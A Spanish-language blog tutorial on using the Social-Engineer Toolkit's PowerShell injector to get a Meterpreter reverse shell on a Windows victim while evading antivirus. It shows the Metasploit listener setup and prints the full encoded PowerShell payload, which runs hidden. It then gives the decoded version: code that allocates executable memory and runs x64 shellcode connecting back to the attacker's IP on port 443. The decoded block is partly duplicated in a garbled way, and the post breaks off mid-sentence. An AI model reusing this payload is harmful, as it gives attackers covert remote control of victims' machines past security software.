Evasión de antivirus con SET y Powershell

Hoy vamos a ver una interesante característica de SET (Social Engineering Toolkit) que nos permitirá obtener fácilmente un shell remoto evadiendo completamente el antivirus mediante un ataque con Windows PowerShell.

La ventaja de Powershell es que podemos añadir clases personalizadas al framework .NET. Mediante el cmdlet 'Add-Type' podemos compilar código CSharp al vuelo y por lo tanto importar funciones desde cualquier DLL. ¿Y para qué?, pues como el framework .NET no permite referenciar directamente la memoria, podemos importar funciones que si lo hagan, copiar un shellcode y ejecutarlo }:). Veamos como llevarlo a cabo:

Lo primero que haremos es actualizar nuestro Metasploit (msfupdate) y SET:
root@bt:/pentest/exploits/set# ./set-update 
[-] Updating the Social-Engineer Toolkit, be patient...
D    config/set_config.py
U    config/set_config
U    config/update_config.py
U    setup.py
A    src/fasttrack/delldrac.py
U    src/fasttrack/mssql.py
U    src/core/set.py
U    src/core/payloadgen/create_payloads.py
U    src/core/setcore.py
U    src/core/dictionaries.py
U    src/core/menu/text.py
U    src/core/fasttrack.py
U    src/html/spawn.py
U    src/html/Signed_Update.jar.orig
U    src/html/unsigned/verified_sign.py
U    src/html/unsigned/unsigned.jar
D    src/webattack/java_applet
U    src/webattack/multi_attack/multiattack.py
U    src/webattack/harvester/scraper.py
U    src/webattack/harvester/harvester.py
U    src/webattack/browser_exploits/gen_payload.py
D    src/webattack/web_clone/linux
D    src/webattack/web_clone/osx
A    src/webattack/web_clone/applet.txt
A    src/webattack/web_clone/applet.database.old
U    src/webattack/web_clone/applet.database
U    src/webattack/web_clone/cloner.py
U    src/webattack/web_clone/repeater.database
U    src/teensy/powershell_down.pde
A    src/teensy/peensy.pde
U    src/teensy/teensy.py
U    src/phishing/smtp/client/smtp_web.py
U    src/phishing/smtp/client/smtp_client.py
U    src/payloads/exe/shellcodeexec.binary
U    src/payloads/powershell/prep.py
U    src/payloads/set_payloads/downloader.windows
A    src/payloads/set_payloads/pyinjector_args.py
U    src/payloads/set_payloads/shell.py
U    src/payloads/set_payloads/shell.windows
A    src/payloads/set_payloads/pyinjector.binary
U    src/payloads/set_payloads/listener.py
U    set
U    readme/CHANGES
U    readme/CREDITS
Updated to revision 1577.
[*] The updating has finished, returning to main menu..
Ejecutamos set y seleccionamos la opción 1) Social-Engineering Attacks) y la opción 10) Powershell Attack Vectors:
                      ________________________
                      __  ___/__  ____/__  __/
                      _____ \__  __/  __  /   
                      ____/ /_  /___  _  /    
                      /____/ /_____/  /_/     

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]                 Version: 4.2.1                   [---]
  [---]         Codename: 'Bagels Bagels Bagels'         [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow us on Twitter: @trustedsec        [---]
  [---]         Follow me on Twitter: @dave_rel1k        [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 10

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow 
you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell 
provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by 
preventative technologies.

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

  99) Return to Main Menu
A continuación elegimos la opción 1) Powershell Alphanumeric Shellcode Injector e introducimos la IP y puerto de nuestro Back Track para que se genere nuestro payload:
set:powershell>1
set> IP address for the payload listener: 192.168.249.128
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
Enter the port number for the reverse [443]: 
[*] Generating x64-based powershell injection code...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass exececution restriction policy...
Después le indicamos que queremos iniciar el listener para que quede a la espera:
set> Do you want to start the listener now [yes/no]: : yes
                _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 988 exploits - 551 auxiliary - 161 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops

[*] Processing reports/powershell/powershell.rc for ERB directives.
resource (reports/powershell/powershell.rc)> use multi/handler
resource (reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (reports/powershell/powershell.rc)> set lport 443
lport => 443
resource (reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) > 
msf  exploit(handler) > 
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...
Ahora, por otra parte, vamos a buscar por dónde anda el shellcode:
root@bt:/pentest/exploits/set/reports/powershell# ls
powershell.rc  x64_powershell_injection.txt  x86_powershell_injection.txt
En el directorio indicado tenemos el código para 32 y 64 bits. Echemos un vistazo a éste último:
powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand JABjAG8AZABlACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3AGkAbgBGAHUAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBvAGQAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMANgA0ACAAPQAgADAAeABmAGMALAAwAHgANAA4ACwAMAB4ADgAMwAsADAAeABlADQALAAwAHgAZgAwACwAMAB4AGUAOAAsADAAeABjADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANAAxACwAMAB4ADUAMQAsADAAeAA0ADEALAAwAHgANQAwACwAMAB4ADUAMgAsADAAeAA1ADEALAAwAHgANQA2ACwAMAB4ADQAOAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADYANQAsADAAeAA0ADgALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAA2ADAALAAwAHgANAA4ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA4ACwAMAB4ADQAOAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADIAMAAsADAAeAA0ADgALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAA1ADAALAAwAHgANAA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADQAYQAsADAAeAA0AGQALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeAA0ADgALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMAAyACwAMAB4ADIAYwAsADAAeAAyADAALAAwAHgANAAxACwAMAB4AGMAMQAsADAAeABjADkALAAwAHgAMABkACwAMAB4ADQAMQAsADAAeAAwADEALAAwAHgAYwAxACwAMAB4AGUAMgAsADAAeABlAGQALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA1ADEALAAwAHgANAA4ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMgAwACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgAMwBjACwAMAB4ADQAOAAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA4ADAALAAwAHgAOAA4ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA2ADcALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgANQAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADQANAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADIAMAAsADAAeAA0ADkALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeABlADMALAAwAHgANQA2ACwAMAB4ADQAOAAsADAAeABmAGYALAAwAHgAYwA5ACwAMAB4ADQAMQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAOAAsADAAeAA0ADgALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAA0AGQALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeAA0ADgALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgANAAxACwAMAB4AGMAMQAsADAAeABjADkALAAwAHgAMABkACwAMAB4ADQAMQAsADAAeAAwADEALAAwAHgAYwAxACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYAMQAsADAAeAA0AGMALAAwAHgAMAAzACwAMAB4ADQAYwAsADAAeAAyADQALAAwAHgAMAA4ACwAMAB4ADQANQAsADAAeAAzADkALAAwAHgAZAAxACwAMAB4ADcANQAsADAAeABkADgALAAwAHgANQA4ACwAMAB4ADQANAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADIANAAsADAAeAA0ADkALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA2ADYALAAwAHgANAAxACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANAA4ACwAMAB4ADQANAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADEAYwAsADAAeAA0ADkALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA0ADEALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4ADgALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgANAAxACwAMAB4ADUAOAAsADAAeAA0ADEALAAwAHgANQA4ACwAMAB4ADUAZQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADQAMQAsADAAeAA1ADgALAAwAHgANAAxACwAMAB4ADUAOQAsADAAeAA0ADEALAAwAHgANQBhACwAMAB4ADQAOAAsADAAeAA4ADMALAAwAHgAZQBjACwAMAB4ADIAMAAsADAAeAA0ADEALAAwAHgANQAyACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADQAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADQAOAAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA1ADcALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADQAOQAsADAAeABiAGUALAAwAHgANwA3ACwAMAB4ADcAMwAsADAAeAAzADIALAAwAHgANQBmACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADEALAAwAHgANQA2ACwAMAB4ADQAOQAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADQAOAAsADAAeAA4ADEALAAwAHgAZQBjACwAMAB4AGEAMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADkALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAA0ADkALAAwAHgAYgBjACwAMAB4ADAAMgAsADAAeAAwADAALAAwAHgAMAAxACwAMAB4AGIAYgAsADAAeABjADAALAAwAHgAYQA4ACwAMAB4AGYAOQAsADAAeAA4ADAALAAwAHgANAAxACwAMAB4ADUANAAsADAAeAA0ADkALAAwAHgAOAA5ACwAMAB4AGUANAAsADAAeAA0AGMALAAwAHgAOAA5ACwAMAB4AGYAMQAsADAAeAA0ADEALAAwAHgAYgBhACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAYwAsADAAeAA4ADkALAAwAHgAZQBhACwAMAB4ADYAOAAsADAAeAAwADEALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA5ACwAMAB4ADQAMQAsADAAeABiAGEALAAwAHgAMgA5ACwAMAB4ADgAMAAsADAAeAA2AGIALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA0AGQALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeAA0AGQALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA0ADgALAAwAHgAZgBmACwAMAB4AGMAMAAsADAAeAA0ADgALAAwAHgAOAA5ACwAMAB4AGMAMgAsADAAeAA0ADgALAAwAHgAZgBmACwAMAB4AGMAMAAsADAAeAA0ADgALAAwAHgAOAA5ACwAMAB4AGMAMQAsADAAeAA0ADEALAAwAHgAYgBhACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAOAAsADAAeAA4ADkALAAwAHgAYwA3ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANAAxACwAMAB4ADUAOAAsADAAeAA0AGMALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeAA0ADgALAAwAHgAOAA5ACwAMAB4AGYAOQAsADAAeAA0ADEALAAwAHgAYgBhACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAOAAsADAAeAA4ADEALAAwAHgAYwA0ACwAMAB4ADQAMAAsADAAeAAwADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADgALAAwAHgAOAAzACwAMAB4AGUAYwAsADAAeAAxADAALAAwAHgANAA4ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgANABkACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA0ADEALAAwAHgANQA4ACwAMAB4ADQAOAAsADAAeAA4ADkALAAwAHgAZgA5ACwAMAB4ADQAMQAsADAAeABiAGEALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANAA4ACwAMAB4ADgAMwAsADAAeABjADQALAAwAHgAMgAwACwAMAB4ADUAZQAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADQAMQAsADAAeAA1ADkALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADEALAAwAHgANQA4ACwAMAB4ADQAOAAsADAAeAA4ADkALAAwAHgAZgAyACwAMAB4ADQAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4ADQAMQAsADAAeABiAGEALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANAA4ACwAMAB4ADgAOQAsADAAeABjADMALAAwAHgANAA5ACwAMAB4ADgAOQAsADAAeABjADcALAAwAHgANABkACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgANAA5ACwAMAB4ADgAOQAsADAAeABmADAALAAwAHgANAA4ACwAMAB4ADgAOQAsADAAeABkAGEALAAwAHgANAA4ACwAMAB4ADgAOQAsADAAeABmADkALAAwAHgANAAxACwAMAB4AGIAYQAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0ADgALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAA0ADgALAAwAHgAMgA5ACwAMAB4AGMANgAsADAAeAA0ADgALAAwAHgAOAA1ACwAMAB4AGYANgAsADAAeAA3ADUALAAwAHgAZQAxACwAMAB4ADQAMQAsADAAeABmAGYALAAwAHgAZQA3ADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgACQAcwBjADYANAA7ACQAcwBpAHoAZQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABzAGMALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQAgAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwBpAG4ARgB1AG4AYwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAaQBuAEYAdQBuAGMAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAaQBuAEYAdQBuAGMAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQAgAHsAIABTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAIAB9ADsA6_powershell_injection.txt
Como véis esta ya todo preparado para ejecutarse en el equipo de la víctima. La opciones son claras: no usaremos perfil de usuario, se ejecutará oculto y no se mostrará prompt al usuario. La codificación del comando a ejecutar simplemente es una conversión Unicode+Base64. Si lo desofuscamos obtendremos:
powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand 
$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xf9,0x80,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xf9,0x80,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
Y poniendo el código un poquito en órden y entendiéndolo tendremos:
